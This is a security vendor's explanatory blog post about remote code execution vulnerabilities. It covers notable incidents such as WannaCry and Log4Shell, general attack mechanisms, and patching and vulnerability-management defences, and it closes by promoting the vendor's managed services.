There were nearly 29,000 vulnerabilities published in 2023, amounting to over 3,800 more common vulnerabilities and exposures (CVEs) being issued last year than in 2022. More troubling than the sheer volume of vulnerabilities in 2023 is that over half of them were given a CVSS score indicating high or critical severity — an increase of 57% YoY.
However, not all vulnerabilities become go-to attack vectors for cybercriminals. For security teams already stretched too thin, a proactive vulnerability management plan that patches or otherwise remediates all vulnerabilities is too far out of reach. The objective for most IT and security teams, then, becomes prioritization based on risk and business goals. And, when it comes to the vulnerabilities most dangerous to an organization’s cybersecurity, one type has risen to forefront: remote code execution (RCE).
In fact, according to Arctic Wolf Labs, nine of the top 10 vulnerabilities of 2023 were RCEs. These nine vulnerabilities were found in 42% of all incidents responded to by Arctic Wolf and, with the continued adoption of the cloud and the ubiquity of hybrid work models, we only expect these types of vulnerabilities to grow in number and severity. Clearly, RCEs are having a moment, and their continued rise poses real cyber risk to organizations across the globe.
What is Remote Code Execution?
Often launched directly from the internet, remote code execution gives the attacker the ability to take control over a process or device and run their own code remotely, without needing to be in the same physical space as the system or device. This separates it from an arbitrary code execution (ACE), which is launched from within a system’s local area network (LAN). Through remote code execution, an attacker can run code from outside the system that triggers an internal ACE.
Once an attacker successfully exploits an RCE vulnerability, they can potentially take complete control over the target system, allowing them to steal sensitive data, disrupt operations, or launch further attacks.
Infamous RCE Attacks
WannaCry
Perhaps the most insidious of all ransomware strains, WannaCry brought ransomware into the mainstream in 2017. The WannaCry ransomware worm spread by exploiting a vulnerability in the Server Message Block Protocol (SMB). This vulnerability allowed an attacker to execute malicious code on vulnerable machines, enabling the ransomware to access and encrypt valuable files. WannaCry managed to affect more than 200,000 Windows computers in 150 countries. It was especially dangerous — and potentially deadly — as the UK’s National Health Service Hospitals were among the most devastated. The Five Eyes Alliance — an intelligence alliance consisting of Australia, Canada, New Zealand, the United Kingdom, and the United States — have attributed the attack to North Korean threat actors.
SolarWinds
In one of the most catastrophic data breaches of 2020, the Russian SVR leveraged a zero-day RCE vulnerability in the SolarWinds Orion Platform to deploy malware across an estimated 18,000 private and government affiliated networks, gaining access to an abundance of identifiable information, including source code, passwords, financial information, and usernames.
Log4j / Log4Shell
In early December 2021, Log4Shell (CVE-2021-44228) was first identified as a zero-day remote code execution vulnerability in Apache Log4j 2. An unauthenticated, remote threat actor could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of Log4j. Arctic Wolf Labs observed one in four organizations in our customer base were targeted with Log4Shell exploitation attempts between January and December of 2022. Log4Shell exploitation was the root point of compromise in 11% of all Arctic Wolf® Incident Response cases in 2022 for customers where incident response services were the customer’s first engagement with Arctic Wolf.
Spring4Shell
In late March 2022, Spring published a security advisory confirming Spring4Shell, a remote code execution (RCE) vulnerability in the Spring Framework. In addition to the security advisory, Spring released patches addressing the vulnerability. The vulnerability, assigned CVE-2022-22965, received a critical severity rating. Notably, the vulnerability impacted not only Spring MVC but also Spring WebFlux applications running JDK 9+. Threat actors were able to leverage this vulnerability to deploy cryptominers and botnet malware into environments.
How Remote Code Execution Works
RCE vulnerabilities allow an attacker to execute arbitrary code on a remote system. This means that an attacker can gain unauthorized access to a system and execute commands or run programs remotely, without having or needing physical access to the target system.
It’s become such a popular vulnerability type for exploit because it gives threat actors initial access into a target network without the need to, for example, execute an identity-based attack like social engineering, which can give them valid credentials to provide that same initial access. With RCE, threat actors can remotely enter a network without relying on credentials at all.
There are several ways a threat actor can achieve remote code execution, including:
Injection
An injection exploit executes malicious queries to take control of a database server that is running a web application. For instance, in a SQL injection, the threat actor injects malicious data the system interprets as a command, allowing them to bypass authentication and authorization of the app to retrieve data from the entire SQL database. It can also be used to add, modify, or delete data from the database.
Deserialization
Serialization is the transformation of an object — say a file folder — into a format that can be preserved, stored, and transmitted, much in the way a .zip file allows you to send a folder containing multiple files as a single unit. Deserialization, then, is the process of undoing that transformation so that the object can be read and/or executed. However, if the deserialized object is unencrypted, threat actors can modify it with malicious code, which leads to unauthenticated RCE.
Out-of-Bounds Write
In this exploit, a threat actor leverages a software’s incorrectly formatted memory allocation to write data beyond the boundaries of a buffer – a temporary data storage location utilized while data is in transfer — which leads to the execution of arbitrary code.
Improper Input Validation
When software applications do not properly sanitize user input, it can allow attackers to upload a file containing malicious code, which the application then executes, believing it to be valid.
The important thing to note is that remote code execution is possible in any computer software or application and is not restricted by programming languages or operating systems. This is another reason why RCE exploits have risen so sharply in the past few years, with no signs of slowing down.
How To Defend Against Remote Code Execution
One of the primary ways to prevent RCE is through timely software updates and patches. As vulnerabilities are discovered in software or an application, the companies behind them will release updates or patches to users. Ensuring that you’re staying on top of this and keeping your software and applications current will help reduce the risk of RCE.
Another effective — and more proactive — method of preventing RCE is through a vulnerability management program. Most critical severity CVE’s that are discovered lead to RCE so it’s important to scan for vulnerabilities in your environment and stay on top of your patching schedule.
Because every organization has different security and business needs that can change, the goal with vulnerability management should not be to eliminate every possible vulnerability, but to take a risk-based approach that reduces risk over time.
The reality is you can’t patch every vulnerability that appears. However, having a regular patching process in place and proactively working on vulnerability management can make a major difference in your cybersecurity architecture, reducing the risk of a breach.
When To Partner With a Third-Party
Many IT and security teams struggle under a lack of budget and a shortage of available security experts, meaning that providing 24×7 monitoring of their entire environment, as well as prompt detection and response, is already a great challenge. Viewed through that lens, adding proactive vulnerability and risk management to that workload is a non-starter.
That’s when partnering with a security operations solutions provider can provide valuable assistance in determining your organization’s unique risk appetite — the amount of risk you’re willing to take on to conduct business — as well as patching and mitigating the vulnerabilities that are most dangerous to your organization.
A managed security operations provider like Arctic Wolf® not only provides 24×7 monitoring, detection, and response from a seasoned team of security experts, but can also discover and assess the risks in your environment by contextualizing your attack surface coverage across your networks, endpoints, and cloud environments, helping you implement effective vulnerability management while improving your security posture.
Learn more about the vulnerabilities your organization needs to look out for in The Arctic Wolf Labs 2024 Threats Report.
